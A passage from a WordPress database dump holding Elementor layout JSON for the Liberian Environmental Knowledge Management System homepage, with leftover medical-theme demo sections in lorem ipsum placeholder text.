sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3103,400,'_elementor_version','2.7.5'),(3104,400,'_elementor_template_type','wp-page'),(3108,401,'_wp_page_template','default'),(3109,401,'_elementor_edit_mode','builder'),(3110,401,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3a3bcf4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"756a496\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e898dc3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8088599\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa 